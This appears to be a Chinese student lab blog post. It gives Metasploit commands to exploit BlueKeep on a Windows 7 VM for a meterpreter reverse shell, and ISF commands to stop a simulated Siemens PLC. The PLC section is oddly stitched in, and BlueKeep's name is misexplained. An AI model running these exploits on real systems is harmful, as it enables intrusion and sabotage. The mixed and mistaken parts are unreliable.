利用windows 7 cve-2019-0708漏洞

环境准备

说明:该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。
    这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

 

环境准备

1.安装Vmware workstaion和Kali linux等软件,配置虚拟环境

2.kali中安装工控漏洞利用框架 ISF

(1)在kali终端中使用命令:

git clone https://github.com/dark-lbp/isf/

(2)输入cd isf

(3)输入python2 isf.py

(4)这时有可能会报错:缺少nmap模块,方法:

A.克隆下载nmap模块的包

B.进入文件夹使用命令python2 setup.py install

C.进入python2中import nmap发现没有报错了,使用exit()退出

D.继续执行 python2 isf.py命令进行安装

3.使用snap7模拟PLC设备,解压压缩包,打开 \rich-demos\x86_64-win64\bin路径

(1).用ipconfig查看本机ip,也即物理机IP,填写到serverdemo.exe中

(2)在serverdemo.exe界面先点击start启动server

(3)可以查看到serverdemo.exe下面日志就显示serverstarted

(4)clientdemo.exe界面上填写上物理机ip

(5)clientdemo.exe界面上点击connect连接

(6)这时继续查看server的日志,显示client已经added(serverdemo.exe)

4.打开ISF后,输入:

use exploits/plcs/siemens/s7_300_400_plc_control

5.show options;set target 物理机IP

6.run

这里显示 stop plc ,同时查看模拟器中的输出,可以发现已经停止

1.开启Kali虚拟机和win7靶机

2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:

3.若3389没打开,可以右键计算机,选择属性

4.选择远程设置

5.选择允许远程连接

7.5.2  利用windows 7 cve-2019-0708漏洞案例

1.kali中使用nmap扫描目标机器端口确认是否开启3389端口:

nmap 192.168.11.133(win7IP)

2.确认开启后启动msfconsole

3. 搜索漏洞:

search 0708

前两个模块,一个是扫描功能,一个是攻击功能。

4.使用攻击功能,也就是第二个模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5.设置目标:

set rhost 被攻击ip     #设置win7ip

set rport 3389   

6.设置payload:

set payload windows/x64/meterpreter/reverse_tcp   #设置64位的payload如果是32位机器则不用加x64

7.设置攻击机:

set lhost 攻击者ip     #设置kali的ip 

set lport 4444           #设置攻击者的监听端口(端口可以随意更改)

8.输入:show targets,显示可以选择的靶机的架构

9.用于vm是15.5.1,所以可以选择target 3-5

10.选择target 3,进行尝试:

set target 3

11.进行攻击,运行:run

12.假如可以建立连接,输入:

run post/windows/manage/enable_rdp

 运行远程桌面模块

13.另开一个kali终端,输入:

rdesktop win7靶机IP

总结

我了解到,CVE-2019-0708是Windows 7和Windows Server 2008中存在的一个远程代码执行漏洞,也被称为“蓝色屏幕死机(BlueKeep)”漏洞。

学习和了解这个漏洞带给我的收获是:

1. 漏洞原理:了解了漏洞是如何利用RDP协议中的一个缓冲区溢出漏洞来实现代码执行的。深入了解漏洞的原理有助于我更好地理解系统安全的重要性和攻击者的思维方式。

2. 危害性:CVE-2019-0708是一个非常危险的漏洞,攻击者可以通过发送恶意的RDP请求来远程执行代码,进而控制受影响的系统。这使得我认识到了系统安全的重要性,并意识到了及时更新和修复系统漏洞的重要性。

3. 补丁和更新:Microsoft已经发布了相应的安全补丁来修复这个漏洞。这让我明白了及时安装系统更新和补丁的重要性,以保持系统的安全性。

4. 安全意识:通过了解这个漏洞,我更加重视了信息安全和网络安全的重要性。我认识到了保护个人和组织的信息、系统和网络的重要性,并更加关注保持系统安全和采取必要的安全措施。总的来说,通过学习CVE-2019-0708漏洞,我加深了对系统漏洞和安全问题的认识,提高了信息安全意识,并增强了保护个人和组织安全的意识和能力。


 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值